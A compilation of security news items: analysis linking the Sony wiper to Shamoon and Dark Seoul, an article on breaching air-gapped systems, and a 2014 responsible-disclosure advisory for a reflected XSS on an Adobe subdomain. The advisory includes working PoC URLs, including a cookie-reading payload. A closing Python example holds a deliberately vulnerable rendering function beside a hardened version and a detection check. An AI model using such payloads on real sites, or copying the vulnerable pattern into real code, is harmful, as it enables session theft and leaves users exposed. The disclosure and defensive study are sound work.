  23. Kaspersky bod Kurt Baumgartner has released more details on the Sony-plundering malware and links it to attacks on Saudi Aramco and South Korea. Research conducted in the wake of the epic Sony breach last month had connected those behind the attack, known as the Guardians of Peace (GOP), with the 2012 hacking of Saudi Aramco by 'WhoIs Team' that hit 30,000 computers with the Shamoon malware at a time when tensions were high between Saudi Arabia and Iran. The malware served to Sony disabled or destroyed corporate machines, forcing the firm to enter an IT lock-down. It was dubbed BKDR_WIPALL by Trend Micro and Destover by Kaspersky. Baumgartner's work added further weight to claims that the malware used in both attacks and the 2013 Dark Seoul hacks were deployed by the same actors. "In all three cases: Shamoon, Dark Seoul and Destover, the groups claiming credit for their destructive impact across entire large networks had no history or real identity of their own," Baumgartner (@k_sec) wrote in an analysis piece. "All attempted to disappear following their act, did not make clear statements but did make bizarre and roundabout accusations of criminal conduct, and instigated their destructive acts immediately after a politically-charged event that was suggested as having been at the heart of the matter. "Images from the Dark Seoul Whois and Destover GOP groups included a 'hacked by' claim, accompanied by a 'warning' and threats regarding stolen data. Both threatened that this was only the beginning and that the group will be back." A further point linking the Sony and South Korea attacks was in the styling of the defacements used, which used skulls and the same colours. The GOP bore a group name with a similar cheesy '90s hacker phonetic structure to the Saudi Aramco culprits known as the 'Cutting Sword of Justice'. There were technological similarities too. 
Shamoon and Wiper used off-the-shelf EldoS RawDisk drivers maintained in the dropper's resource section, while Shamoon and Dark Seoul dropped political messages to overwrite disk data and the master boot record. The hackers worked to a tight deadline in the Dark Seoul and Sony attacks, compiling executables two days before the attack. Shamoon components were similarly rushed, having been built five days from D-day. The commonalities were no smoking gun pointing to North Korea, but the links between the attack campaigns were "extraordinary" given the high-profile nature of the victims, Baumgartner said. "... it should be noted that the reactionary events and the groups' operational and tool set characteristics all carry marked similarities [and] it is extraordinary that such unusual and focused acts of large scale cyber-destruction are being carried out with clearly recognisable similarities," he said. Sony would likely be able to recover its wiped data if the malware was close enough to that used in Shamoon and Dark Seoul, Baumgartner said. Source
  24. How do you remotely hack a computer that is not connected to the internet? Most of the time you can't, which is why so-called air-gapped computers are considered more secure than others. An air-gapped computer is one that is neither connected to the internet nor connected to other systems that are connected to the internet. Air gaps generally are implemented where the system or network requires extra security, such as classified military networks, the payment networks that process credit and debit card transactions for retailers, or industrial control systems that operate critical infrastructure. To maintain security, payment and industrial control systems should only be on internal networks that are not connected to the company's business network, thus preventing intruders from entering the corporate network through the internet and working their way to sensitive systems. A true air gap means the machine or network is physically isolated from the internet, and data can only pass to it via a USB flash drive, other removable media, or a FireWire cable connecting two computers directly. But many companies insist that a network or system is sufficiently air-gapped even if it is only separated from other computers or networks by a software firewall. Such firewalls, however, can be breached if the code has security holes or if the firewalls are configured insecurely. Although air-gapped systems were believed to be more secure in the past, since they required an attacker to have physical access to breach them, recent attacks involving malware that spread via infected USB flash drives have given the lie to this belief. One of the most famous cases involving the infection of an air-gapped system is Stuxnet, the virus/worm designed to sabotage centrifuges used at a uranium enrichment plant in Iran. Computer systems controlling the centrifuges were air-gapped, so the attackers designed Stuxnet to spread surreptitiously via USB flash drives. 
Outside contractors responsible for programming the systems in Iran were infected first and then became unwitting carriers for the malware when they brought their laptops into the plant and transferred data to the air-gapped systems with a flash drive. More recently, evidence has shown that air-gapped systems can also be attacked through radio waves. Researchers in Israel showed how they could siphon data from an air-gapped machine using radio frequency signals and a nearby mobile phone. The proof-of-concept hack involves radio signals generated and transmitted by an infected machine’s video card, which are used to send passwords and other data over the air to the FM radio receiver in a mobile phone. The method is more than just a concept, however, to the NSA. The spy agency has reportedly been using a more sophisticated version of this technique for years to siphon data from air-gapped machines in Iran and elsewhere. Using an NSA hardware implant called the Cottonmouth-I, which comes with a tiny embedded transceiver, the spy agency can extract data from targeted systems via RF signals and transmit it to a briefcase-sized NSA relay station up to eight miles away. That’s a pretty large air gap to jump. This, and the use of attacks via USB flash drives, effectively mean that no air-gapped system is beyond the reach of attackers. Source
  25.
######################################################################
# Exploit Title: Adobe.com Flashplayer sub-domain Reflected XSS (RXSS)
# Date: 08/12/2014
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.adobe.com
# Version: /
# Category: Reflected Cross Site Scripting
# Google dork:
# Tested on: Adobe.com Flashplayer sub-domain
######################################################################

Adobe description :
======================================================================
Adobe Systems Incorporated is a multinational computer software company. Adobe Systems' headquarters are based in San Jose, California, United States. The company has historically focused upon the creation of multimedia and creativity software products, with a more recent foray towards rich Internet application software development. It is best known for the Portable Document Format (PDF), Flash player and Adobe Creative Suite, later Adobe Creative Cloud.

Vulnerability description :
======================================================================
A reflected XSS is available in the get3.adobe.com sub-domain. Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Adobe portals, or capture Adobe users' credentials such as cookies. It's also possible to forge a fake Adobe page with this XSS to provide a backdoored version of the Flash plugin to users. This reflected XSS is on the GET "re" variable, which is not properly sanitized before being used in the page.

Proof of Concept 1 :
======================================================================
A non-persistent XSS (RXSS) in the "re" GET param is available in the get3.adobe.com sub-domain. Tested on Firefox 31.0. After upgrading Flashplayer with the auto-update agent on Windows, a page of the Adobe sub-domain is automatically opened.
This page is opened to check whether the upgrade was successful, and the return code of the auto-update agent is passed through the "re" GET variable. This numeric return code is reinjected into the JavaScript source code of the page and can be crafted to make an XSS.

PoC:
https://get3.adobe.com/fr/flashplayer/completion/aih/?exitcode=1337&re=7331;alert(/Reflected XSS - Yann CAM @asafety - www.synetis.com/);&type=update&appid=200

Proof of Concept 2 :
======================================================================
The session cookie can be retrieved with this XSS.

PoC:
https://get3.adobe.com/fr/flashplayer/completion/aih/?exitcode=1337&re=7331;alert(document.cookie);&type=update&appid=200

Screenshots :
======================================================================
- http://www.asafety.fr/data/20140829-adobe-xss01.png
- http://www.asafety.fr/data/20140829-adobe-xss02.png
- http://www.asafety.fr/data/20140829-adobe-xss04.png

Solution:
======================================================================
Fixed by Adobe PSIRT.

Additional resources :
======================================================================
- https://www.adobe.com/
- https://blogs.adobe.com/psirt/
- https://helpx.adobe.com/security/acknowledgements.html
- http://www.asafety.fr/actualites-news/contribution-adobe-injection-de-code-javascript-xss/
- http://www.synetis.com

Report timeline :
======================================================================
2014-08-28 : Adobe PSIRT Team alerted with details and PoC.
2014-08-30 : Adobe response and issue number affected (2985).
2014-10-28 : Vulnerability not fixed, second email to get a status.
2014-10-28 : Adobe response : still working on this issue.
2014-12-05 : Vulnerability seems to be fixed, third email to get a status.
2014-12-05 : Adobe response : case 2985 closed and acknowledgement.
2014-12-08 : Public advisory

Credits :
======================================================================
www.synetis.com
Consulting firm in management and information security
Yann CAM - Security Consultant @ Synetis | ASafety
--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr

Source
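The advisory above describes a numeric return code ("re") being reinjected verbatim into the page's JavaScript. The following is an added example, not Adobe's code and not the advisory author's: a hypothetical reconstruction of that bug class beside a hardened version (validate the parameter as a bounded integer, then emit it as a JSON literal), plus a log-review heuristic that flags a rendered page whose assigned value is no longer a single number. The URLs are constructed stand-ins, not the advisory's PoC.

```python
"""Added example, not Adobe's code: a hypothetical reconstruction of the bug
class in the advisory (a numeric "re" query parameter reinjected verbatim into
inline JavaScript), next to a hardened version and a log-review check."""
import json
import re
from urllib.parse import unquote_plus, urlsplit


def render_completion_vulnerable(query: dict) -> str:
    """Vulnerable pattern: the raw parameter lands inside script source, so a
    value such as '7331;alert(1)' becomes a second JavaScript statement."""
    re_value = query.get("re", "0")
    return "<script>var exitCode = %s;</script>" % re_value


_RETURN_CODE = re.compile(r"^-?\d{1,6}$")


def parse_return_code(raw):
    """Accept only a bounded integer; anything else is rejected (None)."""
    if raw is None or not _RETURN_CODE.match(raw):
        return None
    return int(raw)


def render_completion_hardened(query: dict):
    """Validate first, then emit the value as a JSON literal so it can never
    alter the structure of the script. None means: answer 400, render nothing."""
    code = parse_return_code(query.get("re"))
    if code is None:
        return None
    return "<script>var exitCode = %s;</script>" % json.dumps(code)


def query_params(url: str) -> dict:
    """First value of each query parameter, split on '&' only (older parse_qs
    versions also split on ';', which would hide exactly this payload shape)."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote_plus(key), unquote_plus(value))
    return params


def has_injected_statement(html: str) -> bool:
    """Log-review heuristic: flag a rendered page whose assigned value is not a
    single numeric literal."""
    m = re.search(r"var exitCode = ([^<]*);</script>", html)
    return m is not None and _RETURN_CODE.match(m.group(1)) is None


# Constructed URLs mirroring the advisory's parameter shape (not the real PoC).
SAMPLE_ATTACK = "https://example.invalid/completion/?exitcode=1337&re=7331;alert(1)&type=update"
SAMPLE_BENIGN = "https://example.invalid/completion/?exitcode=0&re=0&type=update"
```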